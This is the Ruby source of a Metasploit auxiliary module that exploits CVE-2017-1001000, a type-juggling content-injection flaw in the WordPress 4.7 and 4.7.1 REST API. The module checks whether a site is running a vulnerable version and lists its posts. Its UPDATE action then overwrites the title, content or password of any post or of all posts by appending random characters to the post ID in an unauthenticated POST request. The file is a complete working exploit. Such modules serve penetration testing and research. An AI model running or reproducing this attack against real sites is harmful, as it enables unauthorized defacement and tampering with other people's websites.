## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress REST API Content Injection', 'Description' => %q{ This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API. }, 'Author' => [ 'Marc Montpas', # Vulnerability discovery 'wvu' # Metasploit module ], 'References' => [ ['CVE' , '2017-1001000'], ['WPVDB', '8734'], ['URL', 'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html'], ['URL', 'https://www.php.net/manual/en/language.types.type-juggling.php'], ['URL', 'https://developer.wordpress.org/rest-api/using-the-rest-api/discovery/'], ['URL', 'https://developer.wordpress.org/rest-api/reference/posts/'] ], 'DisclosureDate' => '2017-02-01', 'License' => MSF_LICENSE, 'Actions' => [ ['LIST', 'Description' => 'List posts'], ['UPDATE', 'Description' => 'Update post'] ], 'DefaultAction' => 'LIST' )) register_options([ OptInt.new('POST_ID', [false, 'Post ID (0 for all)', 0]), OptString.new('POST_TITLE', [false, 'Post title']), OptString.new('POST_CONTENT', [false, 'Post content']), OptString.new('POST_PASSWORD', [false, 'Post password (\'\' for none)']) ]) register_advanced_options([ OptInt.new('PostCount', [false, 'Number of posts to list', 100]), OptString.new('SearchTerm', [false, 'Search term when listing posts']) ]) end def check_host(_ip) if (version = wordpress_version) version = Rex::Version.new(version) else return Exploit::CheckCode::Safe end vprint_status("WordPress #{version}: #{full_uri}") if version.between?(Rex::Version.new('4.7'), Rex::Version.new('4.7.1')) Exploit::CheckCode::Appears else Exploit::CheckCode::Detected end end def run_host(_ip) if !wordpress_and_online? print_error("WordPress not detected at #{full_uri}") return end case action.name when 'LIST' do_list when 'UPDATE' do_update end end def do_list posts_to_list = list_posts if posts_to_list.empty? print_status("No posts found at #{full_uri}") return end tbl = Rex::Text::Table.new( 'Header' => "Posts at #{full_uri} (REST API: #{get_rest_api})", 'Columns' => %w{ID Title URL Password} ) posts_to_list.each do |post| tbl << [ post[:id], Rex::Text.html_decode(post[:title]), post[:url], post[:password] ? 'Yes' : 'No' ] end print_line(tbl.to_s) end def do_update posts_to_update = [] if datastore['POST_ID'] == 0 posts_to_update = list_posts else posts_to_update << {id: datastore['POST_ID']} end if posts_to_update.empty? print_status("No posts to update at #{full_uri}") return end posts_to_update.each do |post| res = update_post(post[:id], title: datastore['POST_TITLE'], content: datastore['POST_CONTENT'], password: datastore['POST_PASSWORD'] ) post_url = full_uri(wordpress_url_post(post[:id])) if res && res.code == 200 print_good("SUCCESS: #{post_url} (Post updated)") elsif res && (error = res.get_json_document['message']) print_error("FAILURE: #{post_url} (#{error})") end end end def list_posts posts = [] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(get_rest_api, 'posts'), 'vars_get' => { 'per_page' => datastore['PostCount'], 'search' => datastore['SearchTerm'] } }, 3.5) if res && res.code == 200 res.get_json_document.each do |post| posts << { id: post['id'], title: post['title']['rendered'], url: post['link'], password: post['content']['protected'] } end elsif res && (error = res.get_json_document['message']) vprint_error("Failed to list posts: #{error}") end posts end def update_post(id, opts = {}) payload = {} payload[:id] = "#{id}#{Rex::Text.rand_text_alpha(8)}" payload[:title] = opts[:title] if opts[:title] payload[:content] = opts[:content] if opts[:content] payload[:password] = opts[:password] if opts[:password] send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(get_rest_api, 'posts', id), 'ctype' => 'application/json', 'data' => payload.to_json }, 3.5) end def get_rest_api return @rest_api if @rest_api res = send_request_cgi!({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }, 3.5) if res && res.code == 200 @rest_api = parse_rest_api(res) end @rest_api ||= wordpress_url_rest_api end def parse_rest_api(res) rest_api = nil link = res.headers['Link'] html = res.get_html_document if link =~ %r{^<(.*)>; rel="https://api\.w\.org/"$} rest_api = route_rest_api($1) vprint_status('REST API found in Link header') elsif (xpath = html.at('//link[@rel = "https://api.w.org/"]/@href')) rest_api = route_rest_api(xpath) vprint_status('REST API found in HTML document') end rest_api end def route_rest_api(rest_api) normalize_uri(path_from_uri(rest_api), 'wp/v2') end end